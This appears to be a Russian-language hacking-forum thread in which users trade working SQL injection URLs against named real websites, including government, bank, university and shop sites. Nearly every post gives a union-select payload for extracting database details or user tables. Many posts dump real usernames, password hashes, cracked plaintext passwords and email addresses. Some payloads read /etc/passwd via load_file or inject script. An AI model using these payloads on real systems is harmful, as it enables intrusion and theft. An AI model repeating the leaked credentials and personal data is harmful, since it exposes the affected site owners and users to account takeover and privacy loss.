http://green.ru/news/event.htm?id=-64+union+select+1,version(),3,database(),user(),6, 7/*

http://www.technet.ru/index.php?r=18&article=445600000000+union+select+1,2,3,4,concat(u ser,char(58),password)+from+mysql.user/*

root:260cfc6f1773410c
2cinemahouse:1ba73fda30687f14
2polarstroy:47840bf92a60a982
2meliadus:052a215915223512
2webuser:4d4ba5526471e1c6
2danila:468d0af758b04f0e
2zzz_xaxa:1ba73fda30687f14
2user:009094026f11b5c7
2www_log:0fbadc701079a99e
2xserver:1ba73fda30687f14
2pay_kiosk:1ba73fda30687f14
2kinoman:7973a2274ff8dec7
2panfilov:197d87503286f81e
2nvuser:6727aa9d3338d198
2lampertz:0ccc82d454979360
2technet_forum:716d901350790fd6
2prouser:201a3806609af1a7
2whois_cr:29952afe3cd84b11
2www2:1ba73fda30687f14
2store:648ddd17540a34e0
2arsenal2000:02c68e0207f5fd47
2cms:052a215915223512
2db:6c65628f26ae7478
2duma:62a973d2126e440c
2dance:36adff462f93c12f
2minustin:1509cf865592aca0
2kareliacomru:4d4ba5526471e1c6
2ticket:48a651f618f008ff
2polarstroyx:3d06ed497eaa785f
2fm:09a5cf5054e96acc
2mchsmo:163631f64d4e319f
2tyan_web:0ddb641327f83081

Еще есть форум, его не трогал.
PS version 5.

Сайт нашей элиты =))) Green.ru
http://green.ru/news/event.htm?id=-64+union+select+1,version(),3,database(),user(),6, 7/*

http://green.ru/news/event.htm?id=-64+union+select+1,2,3,concat(login,char(58),passwo rd),5,6,7+from+users/*

_____
Я снова тут))) ачат долго не работал у меня! ЕЕЕЕ!!!

http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,session_user(),database(),4/*
http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,concat(username,char(58),userpwd) %20%20,3,4+from+users/*

to Fr-Ron


2user:009094026f11b5c7 - qwerty
2www_log:0fbadc701079a99e - Tradition
2prouser:201a3806609af1a7 - prouser
2arsenal2000:02c68e0207f5fd47 - 1234567
2ticket:48a651f618f008ff - pyfrjvcndf
2kinoman:7973a2274ff8dec7 - kinoman
2meliadus:052a215915223512 - sivtftsp
2cms:052a215915223512 - sivtftsp
2fm:09a5cf5054e96acc - ujxzhern

может байан
President of Georgia
http://www.president.gov.ge/main2.php?l=E&m=4&sm=0&id=-17+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16,17

http://www.stumptuous.com/cms/displaysection.php?sid=-17+union+sel ect+1,2/*
таблицы:
CHARACTER_SETS | COLLATIONS | COLLATION_CHARACTER_SET_APPLICABILITY | COLUMNS | COLUMN_PRIVILEGES | KEY_COLUMN_USAGE | ROUTINES | SCHEMATA | SCHEMA_PRIVILEGES | STATISTICS | TABLES | TABLE_CONSTRAINTS | TABLE_PRIVILEGES | TRIGGERS | USER_PRIVILEGES | VIEWS | article | article_parts | article_section | author | entry | links | links_section | section


чёта пасс не вытягивает(
http://www.abcinformation.org/news_display.php?news_id=74+union+select+1,concat_ ws(char(1),vers ion(),database(),user()),load_file(0x2F6574632F706 173737764),4,5,6,7,8,9,10+admin/*

http://www.scoe.org/content.php?PageId=-2+union+select+concat(user,char(1),password)+from+ m ysql.user/*

root
1b3c4e7a24ec954c

каломны не подобрал
http://gostudy.com.ua/news.phtml?id=-37+union+select+1, 2,3,4,5,6,7,8,9+from+users/*

можт баян=)
http://xakep.ru/articles/vulnerability.asp?key=LCT2795'+or+1=@@version--;
http://xakep.ru/articles/vulnerability.asp?key=LCT2795'+and+1=1--
http://xakep.ru/articles/vulnerability.asp?key=LCT2795'+and+2=1--

каломны не подобрал
http://gostudy.com.ua/news.phtml?id=-37+union+select+1, 2,3,4,5,6,7,8,9+from+users/*
Боянище!!
http://forum.antichat.ru/showpost.php?p=317149&postcount=1393

Константин сори за баян,не углядишь,за всеми.
пасы не нашёл(.юзеров вытягивать лимитом.
http://www.r-id.ru/main/press/news?nid=-31+union+select+1,concat_ws(char(1),name, email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22+from+users+limit+1,1/*
Если найдёте,админка - http://www.r-id.ru/admin/in.php

http://spb-foto.ru/goods/?id=3678' -3 версия(

http://www.bendruomenes.lt/news.php?id=232604+union+select+1,password,USER(), DATABASE(),5,VERSION(),7,8,9,10+from+users/*&strid=11792
моя первая скуля:)

http://www.rarib.ru/pages.cfm?f=law/faq&cat=-102+union+select+1,2,3,LOAD_FILE(char(47,101,116,9 9,47,112,97,115,115,119,100)),5,6,7/*

http://www.rarib.ru/pages.cfm?f=law/faq&cat=-102+union+select+1,2,3,user,5,6,7+from+user/*

http://www.rarib.ru/pages.cfm?f=law/faq&cat=-102+union+select+1,2,3,passwd,5,6,7+from+user/*

Рacковыряйте этот сервант :) У меня дальше не получилось.Есть приличная база на форуме. SMF =(

Кстати - первая скуЛя :)

Copyright (c) 2002-2007 «Райффайзен Банк Аваль»
Зроблено в Студiї Артємiя Лєбєдєва
как я понял выдрать от туда нечего не получится, стоит ограничение на принимаемое количество значений в параметре "ИД". если кто-то сможет, не полинитесь и поделитесь.
/пс. бабло не трогать :D /

http://www.aval.ua/personal/metals_sale/coins/?id=3'84

/*
SELECT coin_id, producer_id, themes_id, series_id, views_id, coining_id, bijou_id, name_ukr name, picture, picture2, picture3, description_ukr description, price, nominal_ukr nominal, weight, diameter, thickuess, year, tirazh, is_published
FROM
coin
WHERE
coin_id = 3'84
*/
ошибку смотрим в исходниках страницы
===================================
http://www.business-ua.com/icard2.phtml?id=-1836+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://vectorlinux.com/article.php?sid=-1+union+select+1,2,3,concat(user(),char(58),databa se(),char(58),version()),5,6,7,8/*
Vector Linux, говорят ничё такой Live-CD :)

http://vectorlinux.com/article.php?sid=-1+union+select+1,2,3,concat(user(),char(58),databa se(),char(58),version()),5,6,7,8/*

http://vectorlinux.com/article.php?sid=-1+union+select+1,2,name,pass,email,6,7,8+from+user s/*

http://www.allaboutjazz.com/php/news.php?id=86311+union+select+1,2,USER(),VERSION( ),5,DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27/*
Нашел таблицу contact, может кто дальше зайдет.

http://www.emotive.ru/shop/index.php?CID=-1+union+select+1,concat(version(),char(58),user(), char(58),database())--
http://www.yuretz.ru/prikol.php?id=471+and+version()%3E4
http://www.temporeal.com.br/produtos.php?id=-1/**/union/**/select/**/1,2,3,4,5,6,user(),version(),9,10,11,12,13,14,16,1 7,18,19,database(),21,22,23,24,25,26,27,28,29,30,3 1,32,33/*

GisMeteo.ru
http://avia.gismeteo.ru/avia.php?id=-27612+union+select+1,2,3,4,5,6,concat(convert(data base()+using+cp1251),convert(char(59)+using+cp1251 ),convert(user()+using+cp1251),convert(char(59)+us ing+cp1251),convert(version()+using+cp1251))/*

http://www.allaboutjazz.com
Уже раз 10 постят
http://www.huinoeau.com/bio_inst.php?id=-9+union+select+1,2,3,4,convert(concat(username,cha r(58),pword)+using+latin1),6,7,8,9+from+users

http://www.hitchedmag.com/article.php?id=-18%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/*

http://www.pirateship.com.cn/article.php?id=-254%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(c oncat(user,char(58),password),0),0),3,4,5,6,7,8,9% 20from%20mysql.user/*

__:)__

ShadOS, и где эти правила?

http://www.recordkicks.com/uk/news_detail.php?idnew=-143+union+select+1,2,passw,4,5,6,7+from+admin/*

Не смог подобрать колонку с логином

//
http://mkp.emokykla.lt/etnine3/1.php?id=12&level=null+union+select+1,2,concat(user(),char(59) ,version()),4/*

http://www.sitronics.ru/?item_id=-118+union+select+1,version( )/*-в самом низу
http://www.seredina.ru/index.php?id=1&city_id=-19+union+select+version( )/*
http://www.paritetk.ru/links.php?part_id=-50+order+by+2 5/*
http://www.crocus-expo.ru/news/?id=-127+order+by+1 0/*

Уральский государственный экономический университет
http://www.usue.ru/general/professors/?id=50%20union%20select%201,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18/*

http://www.fasie.ru/index.php?pid=-1+union+select+1,0x3c7363726970743e616c65727428272 a443156455227293c2f7363726970743e,3,4,5/*
http://www.newdramafest.ru/news.php?nid=-1+union+select+1,2,user(),444/*
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+concat(email,char(58),id,char(58),p wd,char(58))+from+users/* Вывод в Титле! Пасы к форуму! Форум шляпный ((
http://www.informeco.ru/sud.php?stat=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+ information_schema.tables/*

http://www.fotocopy.ru/catalog/showcd.html?id=1339'
http://www.skripov.com/index.php?date=2007-02-15&page=12&item_id=157640'
http://www.infosystems.ru/TestCenter/order.asp?TestID=5839'
http://www.azs-snab.ru/answer_board.php?id=13977'
---------------------------------------------------
http://www.crdf.ru/?id=-20+order+by+9/*
---------------------------------------------------
http://archive.officemart.ru/news_print.htm?id=1417'+union+select+1,2,3,4,5+fro m+email/*
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*

http://www.fotocopy.ru/catalog/showcd.html?id=1339'
http://www.skripov.com/index.php?date=2007-02-15&page=12&item_id=157640'
http://www.infosystems.ru/TestCenter/order.asp?TestID=5839'
http://www.azs-snab.ru/answer_board.php?id=13977'
---------------------------------------------------
http://www.crdf.ru/?id=-20+order+by+9/*
---------------------------------------------------
http://archive.officemart.ru/news_print.htm?id=1417'+union+select+1,2,3,4,5+fro m+email/*
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*


Одна инъекциЯ
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*
Остальное Шняга какаято...

http://sibron.ru/index.php?option=com_content&id=0&Itemid=0&task=section
выдает ошибку:
Fatal error: Call to undefined method: mosempty->set() in /var/optpart/local/apache/http/sibron.ru/ht docs/components/com_content/content.php on line 197
но если поставить кавычку в конце - всё ок
в чем может быть дело?
движок mambo имхо > 4.5
посоветуйте что нить плз!

http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,4,name,6,7,8,9+from+forum/*
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),user(),5,6/*

Сайт: http://flash-gorod.net/
уязвимость: http://flash-gorod.net/files.php?cat=4'
подобранные таблицы: users
подобранные поля: nick,password,icq,email,city,sex
767 организмов
http://flash-gorod.net/files.php?cat=-4%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,c oncat_ws(0x3a,id,nick,password,icq,email,city,sex) %20from%20users/*

попалась скуль в банке таджикистана =)
помогите вывести записи!!!
http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*

sorry глюканул чё та я.

http://www.akvilon.biz/index.php?content=products&prd_id=-48+union+select+1,2,3, 4/*
Таблицы:
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, banners, categories, images, news, newspics, partners, prices, product_docs, products, sertificates
---------------------------
http://www.uprav.biz/show_action.php?action_id=14762'+union+select+1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6, 7,8,9,10,1,2,3,4,5,6,7,8,9/* -слепая инж order49

Сайт: http://inetoncd.ru/
уязвимость: http://inetoncd.ru/catalog_order.php?hash=211638&mom=76'
подобранные таблицы: clients
подобранные поля: id,login,password
3392 организма
http://inetoncd.ru/catalog_order.php?hash=211638&mom=-76%20union%20select%201,2,concat_ws(0x3a,id,login, password),4,5,6%20from%20mysql.clients/*

попалась скуль в банке таджикистана =)
помогите вывести записи!!!
http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*

http://www.nbt.tj/?c=44&id=44&a=-289+union+select+1,AES_DECRYPT(AES_ENCRYPT(databas e(),0x71),0x71),3,4,5/*но таблиц чето не нашел :(

Новосибирский Гос Тех Университет
Сайт: http://inform.nstu.ru/
уязвимость: http://inform.nstu.ru/index.php?type=ubilei&stat=1'
подобранные таблицы: users
подобранные поля: login,password
7 организмов
http://inform.nstu.ru/index.php?type=ubilei&stat=-1%20union%20select%201,2,concat(login,char(58),pas sword),4,5,6,7,8,9,0,1,2,3%20from%20users%20limit% 200,1/*

нулевой организм: ZiF:0b2fdf29656163be070897c655defc12 rockme

Незавершенное:

Сайт: http://www.step-into-the-future.ru/ (олимпиада "Шаг в будущее")
Информация: (stepin@aqua2.di-net.ru:4.0.26) http://www.step-into-the-future.ru/frb_light/view_all_topic.php?&mid=-1&t=&text_po isk=&m_id=-534+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion()),6,7,8/*

Сайт: http://www.idance.ru/ (Портал современных танцев iDance)
Информация: (idancer_idancedb@localhost:4.1.22)
http://www.idance.ru/show.php?id_s=-15+union+select+concat_ws(0x3a,user(),version()),2/*

Сайт: http://www.kif-daks.ru/ (Оптовая торговля книгами. КИФ-Дакс)
Информация: (mataru@localhost:4.1.20-lk-log)
http://www.kif-daks.ru/newprew.php?id=-336+union+select+1,concat_ws(0x3a,user(),version() ),3,4,5,6,7,8/*

Кто продвинется, пишем.

http://opel.avto-city.ru/catalog.php?id=-3+union+select+login,2,pass,4,5,6,7+from+admin/*
opel:reklama
Автоцентр Сити - официальный дилер Opel (Опель)

http://www.seredina.ru/index.php?id=1&city_id=-12+union+select+concat(login,char(58),pwd)+from+ad mins/* хороша :D дружно ищем админку

http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,version(),5,6,7/*

Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...

Сайт: http://www.audiobookz.ru/
уязвимость: http://www.audiobookz.ru/show_r.php?r=1'
подобранные таблицы: users
подобранные поля: login,pas,uid,name
http://www.audiobookz.ru/show_r.php?r=1+union+select+concat_ws(0x3a,uid,nam e,login,pas)+from+users/*
есть админка http://www.audiobookz.ru/admin/ , но не пашет.

www.equipnet.ru
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+concat(convert(version()+using+ cp1251),char(59),database(),char(59),user())/*

comedy
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...

Нашел таблицы news, ibf_members, ibf_admin_sessions и т.д. но походу ibf_* не от того форума, который действует на сайте.

http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,concat_ws(0x3a,id,name,passwo rd,email,ip_address),5,6,7+from+ibf_members+limit+ 1,1/*

www.photodom.com
http://www.photodom.com/mypage.php?nick=Font'+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,version(),15,16,17,18,19,user(),dat abase(),22,23,24,25,26,27,28,29/*

www.coffeeblues.ru
http://www.coffeeblues.ru/news/index.php3?id=-31+union+select+1,2,concat(database(),char(58,58), user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/*

www.super.com.ua
http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=65&id=-21096+union+select+1,2,3,4,5,6,7,8,9,concat(databa se(),char(58,58),user(),char(58,58),version()),11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30/*

apelsinclub.ru
http://www.apelsinclub.ru/show.php?event=-1+union+select+1,2,3,concat(nick,0x3a,pwd),5,6,7+f rom+users/*
pwd=email в форме логина.
пароли в чистом виде
admin:uuu

http://www.dukemednews.org/news/article.php?id=6041111+union+select+1,2,password,u ser,5,6+from+mysql.user/*
//---
http://www.fondsk.ru/article.php?id=63900+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21+from+author/*
не до конца=)

Тут все просто в шоколаде =)
http://www.flugzeugbilder.de/show.php?id=999999+union+select+1,2,3,database(),5 ,user,user(),version(),password,10,11,12,13,14,15, 16,17,18,19,20+from+mysql.user/*

Тут не очень =\

http://www.cssbeauty.com/jobs/show.php?id=374+union+select+convert(concat_ws(cha r(58,58,58),version(),user(),database())+using+lat in1)/*
http://www.ihrc.org.uk/show.php?id=-1740+union+select+1,2,version(),4,5,6,user(),datab ase(),9,10,11,12,13/*

http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),cha r(58),password),11,12+from+user/*
domkinospbru:ahin

http://www.fondsk.ru/article.php?id=-641+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+article/*
http://www.flirtanica.ru/articles1.php?id=-18+union+select+1,concat(version(),char(58),databa se()),3,4,user()+from+articles/*
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),cha r(58),password),11,12+from+user/*
http://www.ollo.su/damp_phpforum/viewmsg.php?msg_id=-402+union+select+1,user(),3,database(),5,version()/*

http://www.rosprom.gov.ru/documents.php?id=-69+union+select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37/*
тишина . . . .если кто нибудь подберет колонки отпишитесь . . .

www.uragan.ru

URAGAN - сайты дешево, быстро и качественно

http://www.uragan.ru/main/txt.php?textid=howzakaz&menu=-6+union+select+1,concat(name,char(58),pass),3,4,5, 6+from+users/*&submenu=33

Uragan:zxcvb9

Dialog:umnica11123

2KPOT_f!nd

http://www.rosprom.gov.ru/documents.php?id=-69/**/union/**/select/**/1,2,3,4,5,concat(version(),char(58),user()),7/*

http://www.anecdote.com.au/coursedisplay.php?cid=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,version(),52/*

:)

http://fanboys-online.com/comic.php?cid=133+union+select+1,version(),3,4,5+f rom+comics/*

рылся в исходниках, но похоже авторы скрипт переписали) ибо таблицы как по дефолту нет :(

http://inthefray.com/html/article.php?sid=-1+union+select+1,2,3,4,concat(uid,0x3a,uname,0x3a, name,0x3a,email,0x3a,pass),6,7,8,concat(user_icq,0 x3a,user_aim,0x3a,user_yim,0x3a,user_msnm,0x3a,url ,0x3a,emailpass)+from+mpn_users+where+uid=2/*
Всего 790 пользователей.
http://inthefray.com/html/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,concat(id,0x3a,uid, 0x3a,account,0x3a,popserver,0x3a,port,0x3a,0x3a,un ame,0x3a,passwd)+from+mpn_popsettings+where+id=1/*
SiXSS-атака в действии:
http://inthefray.com/html/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,char(60,115,99,114, 105,112,116,62,97,108,101,114,116,40,34,83,105,88, 83,83,45,97,116,116,97,99,107,46,32,72,101,108,108 ,111,44,65,78,84,105,67,72,65,84,33,32,58,41,34,41 ,60,47,115,99,114,105,112,116,62)/*
:)

http://www.mainlandbcmfrc.com/cms/content.php?cid=-31+union+select+1,2,3,4,5,6,7,concat(username,0x3a ,user_password)+from+phpbb_users/*

Delta:biz - админ.

админка на форуме:

http://mainlandbcmfrc.com/forum/index.php

http://www.bimmerdesign.ru/BD/install/upgrade_301.php?step=SomeWord
http://www.sovok.co.uk/install/upgrade_301.php?step=SomeWord
http://sonytrade.com.ua/forum/install/upgrade_301.php?step=SomeWord
http://bigtravel.ru/forum/install/upgrade_301.php?step=SomeWord
http://forum.priluchina.com/install/upgrade_301.php?step=SomeWord
http://skripach.ru/phorum/install/upgrade_301.php?step=SomeWord
http://fresh.org.ua/forum/install/upgrade_301.php?step=SomeWord

http://www.bimmerdesign.ru/BD/install/upgrade_301.php?step=SomeWord
http://www.sovok.co.uk/install/upgrade_301.php?step=SomeWord
http://sonytrade.com.ua/forum/install/upgrade_301.php?step=SomeWord
http://bigtravel.ru/forum/install/upgrade_301.php?step=SomeWord
http://forum.priluchina.com/install/upgrade_301.php?step=SomeWord
http://skripach.ru/phorum/install/upgrade_301.php?step=SomeWord
http://fresh.org.ua/forum/install/upgrade_301.php?step=SomeWord
ты разделом не ошибся?

http://www.sexshop-online.ru/index.php?part=-16+union+select+1,2,concat(database(),0x3a,version ()),user(),5,6,7,8,9,10,11,12,13/*
sex shop => магазин, вот с таблицами у мну траблы. . .

http://www.sexshop-online.ru/index.php?part=-16+union+select+1,2,concat(database(),0x3a,version ()),user(),5,6,7,8,9,10,11,12,13/*
sex shop => магазин, вот с таблицами у мну траблы. . .
ну вот например:
http://www.sexshop-online.ru/index.php?part=-16+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13+ from+subscribers/*
спам-лист)

http://www.sexshop-online.ru/index.php?part=-16+union+select+1,2,concat(database(),0x3a,version ()),user(),5,6,7,8,9,10,11,12,13/*
sex shop => магазин, вот с таблицами у мну траблы. . .
не знаю поможет,нет,есть таблица orders.

Люблю миллер :)

ты разделом не ошибся?


кода я прошлый раз выкладывал меня сюда послали...

www.pays-sud-aisne.fr
http://www.pays-sud-aisne.fr/index.php?page_id=-3+union+select+1,2,concat(version(),char(58,58),da tabase(),char(58,58),user()),4/*

www.argusvalentines.com
http://www.argusvalentines.com/index.php?rayon_id=-267+union+select+concat(version(),char(58,58),data base(),char(58,58),user()),2/*

www.selfserviceworld.com
http://www.selfserviceworld.com/research.php?rc_id=-417+union+select+concat(version(),char(58,58),data base(),char(58,58),user()),2,3,4,5,6,7,8/*

Isis - www.selfserviceworld.com

Код:

http://www.selfserviceworld.com/research.php?rc_id=-417+union+select+concat(version(),char(58,58),data base(),char(58,58),user()),2,3,4,5,6,7,8/*


http://www.selfserviceworld.com/research.php?rc_id=-417+union+select+password,2,id,4,5,6,7,8+from+user s/*

www.tozsdeforum.hu
http://www.tozsdeforum.hu/multiforum/forum_user.phtml?user_id=2+union+select+concat(ver sion(),char(58,58),database(),char(58,58),user()), 2,3,4/*

fragrancesandmore.com
http://fragrancesandmore.com/product_list_category.php?category_id=-48+union+select+1,convert(concat(version(),char(58 ,58),database(),char(58,58),user())+using+latin1)/*

www.vacationrental-hawaii.com
http://www.vacationrental-hawaii.com/vacationrentals/popup/calendar_year.php?rental_id=-1+union+select+1,user(),3,database(),char(32),char (32),version()/*&calyear=2007

http://www.trubka.net/showsoft.php?id=-1112+union+select+1,2,3,user(),5,6,7,version(),9,1 0,database(),12/*
http://www.rusbiotech.ru/novice/show.php?id=-1832+UNION+SELECT+1,2,3,user(),5,version(),7,datab ase(),9,10/*

Студия бурусова

http://www.burusov.ru/cgi-bin/catalog/viewgroup.cgi?prigroup=-1+union+select+concat(name,char(58),user),version( ),0,0%20from%20users/*

www.tozsdeforum.hu

нашел admins : username,password
kovacsp:$1$b1d048fb$0Lo0.JKNevQrCxMzizBVj/
user : userid,email
users : nick,passwd,email,homepage но выводится только ник, остальные поля нет (пустые?)http://www.tozsdeforum.hu/multiforum/forum_user.phtml?user_id=2+union+select+concat_ws( 0x3a,nick,email,passwd,homepage),2,3,4+from+users+ limit+2433,1/* phpads_admin : admin,admin_pw,admin_email,name
kovacsp:188827d3e4098d591ad3a04e76836d7d http://www.tozsdeforum.hu/multiforum/forum_user.phtml?user_id=2+union+select+concat_ws( 0x3a,admin,admin_pw,admin_email,name),2,3,4+from+p hpads_config/* phpads_clients : clientid,clientusername,clientpassword,clientname, email http://www.tozsdeforum.hu/multiforum/forum_user.phtml?user_id=2+union+select+concat_ws( 0x3a,clientid,clientusername,clientpassword,client name,email),2,3,4+from+phpads_clients/* phpads_affiliates : username,password,name,website,email http://www.tozsdeforum.hu/multiforum/forum_user.phtml?user_id=2+union+select+concat_ws( 0x3a,username,password,name,website,email),2,3,4+f rom+phpads_affiliates+limit+0,1/*

www.pangeya.ru

ПАНГЕЯ
книжный интернет-магазин
эзотерической литературы

http://www.pangeya.ru/about_info.php?shopid=-1050/**/union/**/select/**/1,2,3,4,concat(username,char(58),password),6,7,8,9 ,10,11,12,13,14+from+admin/*&page=1&tip=1&catid=17&sort=my,%20name

admin:e0bd24ef4ed786c54b7cd70f86ae47e8

www.nycgovparks.org
http://www.nycgovparks.org/sub_newsroom/daily_plants/daily_plant_main.php?id=-10606+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,concat(version(),char(58,58),database(),ch ar(58,58),user()),18,19,20,21,22,23,24,25,26/*

www.turk-jem.dergisi.org
http://www.turk-jem.dergisi.org/text.php3?id=-219+union+select+1,2,3,concat(version(),char(58,58 ),database(),char(58,58),user()),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

www.together.spbru.net
http://www.together.spbru.net/prt.php?part=2+union+select+1,2,3,convert(concat(v ersion(),char(58,58),database(),char(58,58),user() )%20using%20cp1251),5,6,7,8,9/*

www.kioskmarketplace.com
http://www.kioskmarketplace.com/research.php?rc_id=-9999+union+select+1,concat(version(),char(58,58),d atabase(),char(58,58),user()),3,4,5,6,7,8/*

www.wolfgreenfield.com
http://www.wolfgreenfield.com/index.php?page=industries&sub=detail&id=1+union+select+1,concat(version(),char(58,58),d atabase(),char(58,58),user())/*

http://www.boyersteel.com/products.php?id=-2+union+select+1,2,3,4/* лажа бррр тьфу

http://www.atkinsalltheway.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
http://www.wizardmagicchat.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*http://forum.lafemmebonita.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*http://www.pmcportal.ca/modules/mx_kb/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*

__:)__

www.travelonline.ru
http://www.travelonline.ru/smallwin.php?pg=pinfo&id=-1+union+select+1,concat(version(),char(58,58),data base(),char(58,58),user()),3,4,5,6,7,8,9,10,11,12, 13/*

www.archery.ru
http://www.archery.ru/news/?id=39'+union+select+1,2,3,concat(version(),char(5 8,58),database(),char(58,58),user()),5/*

koleso.topof.ru
http://koleso.topof.ru/news.php?pID=1621'+union+select+1,2,convert(concat (version(),char(58,58),database(),char(58,58),user ())%20using%20cp1251),4,5,6,7,8,9,10,11,12,13,14,1 5/*

new.groteck.ru
http://new.groteck.ru/golosovalka/obrab2.php?question_id=1+union+select+1,concat(ver sion(),char(58,58),database(),char(58,58),user()), 3/*

bl4u.ru
http://bl4u.ru/top.php?id=6817+union+select+1,2,concat(version(), char(58,58),database(),char(58,58),user()),4/*

Isis - new.groteck.ru
http://new.groteck.ru/golosovalka/obrab2.php?question_id=1+union+select+1,concat(id, 0x3a,password,0x3a,email),3+from+users/*
3e01cfcabad4d6e3c15247cbea55550b:12345:hafizov@gro teck.ru
a22b159764657f4dbb61f921f432f76f:3235017:libar@gro teck.ru
fcdf1a4022712610921701dbf442d83b:htuekzwbz:gudko@g roteck.ru
dcf22761b01787d24615d930079bf36f:123:fedoseeva@gro teck.ru
bfc16c5b7c86590af85f5cdd23103413:123456789:timokho v@groteck.ru
025e1cfc5e6a3ad901a811d9652fb0a5:trombonkl;kl;:ivl ev@groteck.ru
a22b559764657f4dbg61f921f432f76f:pass2sys:kuzmina@ groteck.ru
a22b159764657f4dbb61f421f432f744:itsec2010:kalugin a@groteck.ru
a22b5g97646e7f4dbgu1f92wf43uif73f:pass2groteck.adm in:tufteev@groteck.ru

www.archery.ru

http://www.archery.ru/news/?id=39%27+union+select+1,2,concat(username,char(58 ),user_password,char(58),user_email,char(58),user_ icq),4,5+from+phpbb_users/*
логин:хеш:мыло:icq

1)http://www.zhg.ru/sprav/orgs/org.php?id=3'
http://untp.org.ua/index.php?id=-131+union+select+1,2,version( ),4,5,6/*
c таблицами ж0па(

2)http://www.chayka.org/author.php?id=-163+order+by+3/*
http://gaia.arctic.org.ru/news/news.php?id=-74+union+select+1,version(),3,4,5,6,7+from+n ews/*
такая же хня из только news

Украина..........
3)http://untp.org.ua/index.php?id=-131+union+select+1,2,version( ),4,5,6/*

4)http://avd.org.ua/ukr/viewdetails.php?id=-142+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13, 14/*

5)http://cipa.org.ua/ukr/news/news.php?id=-135+union+select+1,version( ),3,4,5,6,7/*

ВНИМАНИЕ!!

В связи с возросшим интересом к данной теме и появлению здесь огромного колличества боянов, за которые выставляються такие же положительные оценки как и за оригинал, я решил погонять тему и создать примитивный антибоянчик. Мера конечно запоздавшая но все-таки!
Просто проверяйте свои скули по собранному мной листу.
http://hlamidnik.h18.ru/SQLS.html

Система до безобразия проста, пока обработано только 27 страниц но до среды соберу там все.
З.Ы Имхо за боян надо выставлять неудовлетворительные оценки.
З.Ы.Ы Выделить бы какнить этот пост)

http://photo-masters.net/seminars.php?code=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27+from+users+limit+0,1/*

^^

ВНИМАНИЕ!!

